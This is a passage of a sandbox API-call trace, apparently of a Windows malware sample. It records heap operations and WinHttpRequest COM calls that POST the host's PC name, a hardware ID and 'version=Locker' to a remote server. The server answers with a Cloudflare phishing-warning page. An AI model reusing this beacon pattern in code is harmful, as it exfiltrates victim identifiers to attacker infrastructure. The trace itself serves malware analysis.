[0273.309] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=2) returned 0x0 [0273.309] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeeb890 | out: hHeap=0xcc0000) returned 1 [0273.309] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xd0dc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8df1b0 | out: ppTInfo=0x8df1b0*=0xe99284) returned 0x0 [0273.309] ITypeInfo:RemoteGetTypeAttr (in: This=0xe99284, ppTypeAttr=0x8df1a8, pDummy=0x356310 | out: ppTypeAttr=0x8df1a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalGetIDsOfNames (This=0xe99284) returned 0x0 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x0, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x1, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x2, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x3, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x4, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.309] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x5, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.309] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x6, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.310] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x7, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.310] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x8, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.310] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x9, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.310] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xa, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.310] ITypeInfo:LocalReleaseTypeAttr (This=0xe99284) returned 0xea8b78 [0273.310] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.310] WinHttpRequest:IUnknown:Release (This=0xe99284) returned 0x1 [0273.310] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x34) returned 0xf16768 [0273.310] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=([0]=0xf1676c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xf1677c*(varType=0x8, wReserved1=0x0, wReserved2=0x3534, wReserved3=0x322, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.310] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.310] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.310] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b58 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf16768 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda258 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf39068 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5eb8 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.311] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.311] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b58 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda258 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ad8 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5eb8 [0273.311] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda270 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xddb620 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda390 [0273.312] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.312] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.312] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.312] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5eb8 | out: hHeap=0xcc0000) returned 1 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b28 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.312] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xa) returned 0xdda270 [0273.312] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="Send", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=5) returned 0x0 [0273.312] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.312] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xd0dc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8df1b0 | out: ppTInfo=0x8df1b0*=0xe99284) returned 0x0 [0273.312] ITypeInfo:RemoteGetTypeAttr (in: This=0xe99284, ppTypeAttr=0x8df1a8, pDummy=0x356310 | out: ppTypeAttr=0x8df1a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.312] ITypeInfo:LocalGetIDsOfNames (This=0xe99284) returned 0x0 [0273.312] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x0, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.312] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.312] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x1, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.312] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.312] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x2, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.312] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x3, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x4, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x5, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x6, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x7, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x8, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x9, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xa, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xb, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xc, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0xd, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.313] ITypeInfo:LocalReleaseTypeAttr (This=0xe99284) returned 0xea8b78 [0273.313] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.313] WinHttpRequest:IUnknown:Release (This=0xe99284) returned 0x1 [0273.313] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeeb9e0 [0273.314] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8df2a0*(rgvarg=([0]=0xeeb9e4*(varType=0x8, wReserved1=0xee, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=QthmGyS3ppLGdhYpDFqrN&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=([0]=0xeeb9e4*(varType=0x8, wReserved1=0xee, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=QthmGyS3ppLGdhYpDFqrN&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe799e8 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ac0 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85930 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd02880 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01928 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ac0 | out: hHeap=0xcc0000) returned 1 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ac0 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xd26d50 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01928 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeeb9e0 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.494] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe799e8 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.494] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ac0 | out: hHeap=0xcc0000) returned 1 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85930 | out: hHeap=0xcc0000) returned 1 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.495] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85930 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85950 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858f0 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1a) returned 0xee61d8 [0273.495] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=9) returned 0x0 [0273.495] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee61d8 | out: hHeap=0xcc0000) returned 1 [0273.495] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x14) returned 0xf23448 [0273.495] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x8df2a0*(rgvarg=0xf2344c, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x8df288, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=0xf2344c, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x8df288*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xdd91a8), pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.501] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.501] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1fb0) returned 0xf49da8 [0273.501] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858c0 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23448 | out: hHeap=0xcc0000) returned 1 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858f0 | out: hHeap=0xcc0000) returned 1 [0273.501] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ad8 | out: hHeap=0xcc0000) returned 1 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.501] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.502] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85930 | out: hHeap=0xcc0000) returned 1 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85930 [0273.502] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ad8 | out: hHeap=0xcc0000) returned 1 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6368 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79ad8 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79838 [0273.502] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.502] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6390 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85950 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79820 [0273.502] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xe79850 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85950 [0273.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
